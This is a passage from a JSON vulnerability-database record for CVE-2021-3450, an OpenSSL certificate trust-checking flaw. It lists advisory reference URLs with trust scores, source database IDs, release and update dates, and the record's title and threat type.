0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4083" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6520674" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1618" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2228" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-cloud-pak-for-security-has-several-security-vulnerabilities-addressed-in-the-latest-version/" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162307/red-hat-security-advisory-2021-1338-01.html" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162699/red-hat-security-advisory-2021-2041-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6520474" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021072056" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1065" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021042502" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162013/red-hat-security-advisory-2021-1024-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-cve-2021-3449-cve-2021-3450/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-may-affect-ibm-workload-scheduler/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6523070" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4058" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/161984/ubuntu-security-notice-usn-4891-1.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-app-connect-enterprise-certified-container-may-be-affected-by-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/" }, { "trust": 0.6, "url": 
"https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affects-ibm-infosphere-information-server/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2259.2" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-are-affected-by-vulnerabilities-in-node-js-cve-2021-3450-cve-2021-3449-2/" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/163257/red-hat-security-advisory-2021-2130-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021051226" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021072765" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1225" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021041615" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021071904" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1075" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1082.2" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021042114" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021101938" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-server-is-affected-by-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1191" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021050609" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2160" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.1025" }, { "trust": 0.6, "url": 
"https://packetstormsecurity.com/files/162151/red-hat-security-advisory-2021-1168-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integration-is-vulnerable-to-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021101261" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021062703" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162196/red-hat-security-advisory-2021-1199-01.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2408" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022041940" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1757" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022060315" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162337/red-hat-security-advisory-2021-1369-01.html" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022011038" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021062315" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162383/red-hat-security-advisory-2021-1448-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerabilities-affect-ibm-sterling-connectexpress-for-unix-cve-2021-3449-cve-2021-3450/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021050615" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.3141" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6479351" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-rational-clearquest-cve-2021-3449-cve-2021-3450/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022031104" }, { "trust": 0.5, "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce" }, { 
"trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2021-3449" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2021-3450" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-20305" }, { "trust": 0.3, "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3450" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3449" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2021-3115" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2021-3114" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20305" }, { "trust": 0.2, "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10356" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-20454" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20916" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19221" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-20907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13631" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422" }, { "trust": 
0.1, "url": "https://access.redhat.com/security/cve/cve-2020-7595" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13632" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-8492" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-16168" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-9327" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-13630" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-20387" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.5/html/serverless_applications/index" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5018" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20218" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1000858" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-13050" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-14889" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-1730" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9327" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-16935" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-19906" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-13627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-19221" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-6405" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-20388" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388" }, { "trust": 0.1, "url": 
"https://nvd.nist.gov/vuln/detail/cve-2019-15903" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-20843" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:2021" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-13631" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20387" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8492" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-5018" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-19956" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-13632" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-15903" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-14422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13630" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-6405" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-20218" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7595" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16168" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-20916" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/2974891" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:1189" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { 
"trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3115" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless_applications/index" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3114" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:1338" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:1200" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.37" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27918" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-8285" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-27918" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-8231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3520" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-15358" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-33196" }, { "trust": 0.1, "url": 
"https://access.redhat.com/security/cve/cve-2020-28196" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33197" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-33195" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-8284" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33198" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-8927" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-33198" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-31525" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-27218" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-34558" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-2708" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-9169" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-27618" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:3556" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-29362" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3326" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3516" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358" }, 
{ "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2019-25013" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-33197" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-29361" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3518" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-10228" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-13434" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3517" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-8286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3326" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2020-29363" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8927" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29363" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31525" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-20271" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3703" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3541" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-14502" } ], "sources": [ { "db": "VULHUB", "id": "VHN-388430" }, { "db": "PACKETSTORM", "id": "162694" }, { "db": "PACKETSTORM", "id": "162172" }, { "db": "PACKETSTORM", "id": 
"162307" }, { "db": "PACKETSTORM", "id": "162197" }, { "db": "PACKETSTORM", "id": "164192" }, { "db": "CNNVD", "id": "CNNVD-202103-1456" }, { "db": "NVD", "id": "CVE-2021-3450" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-388430" }, { "db": "PACKETSTORM", "id": "162694" }, { "db": "PACKETSTORM", "id": "162172" }, { "db": "PACKETSTORM", "id": "162307" }, { "db": "PACKETSTORM", "id": "162197" }, { "db": "PACKETSTORM", "id": "164192" }, { "db": "CNNVD", "id": "CNNVD-202103-1456" }, { "db": "NVD", "id": "CVE-2021-3450" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-03-25T00:00:00", "db": "VULHUB", "id": "VHN-388430" }, { "date": "2021-05-19T14:19:18", "db": "PACKETSTORM", "id": "162694" }, { "date": "2021-04-14T16:31:48", "db": "PACKETSTORM", "id": "162172" }, { "date": "2021-04-23T15:10:34", "db": "PACKETSTORM", "id": "162307" }, { "date": "2021-04-15T13:50:04", "db": "PACKETSTORM", "id": "162197" }, { "date": "2021-09-17T16:04:56", "db": "PACKETSTORM", "id": "164192" }, { "date": "2021-03-25T00:00:00", "db": "CNNVD", "id": "CNNVD-202103-1456" }, { "date": "2021-03-25T15:15:13.560000", "db": "NVD", "id": "CVE-2021-3450" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-28T00:00:00", "db": "VULHUB", "id": "VHN-388430" }, { "date": "2022-07-26T00:00:00", "db": "CNNVD", "id": "CNNVD-202103-1456" }, { "date": "2023-11-07T03:38:00.923000", "db": "NVD", "id": "CVE-2021-3450" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": 
"CNNVD", "id": "CNNVD-202103-1456" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Trust Management Issue Vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-202103-1456" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "trust management problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-202103-1456" } ], "trust": 0.6 } }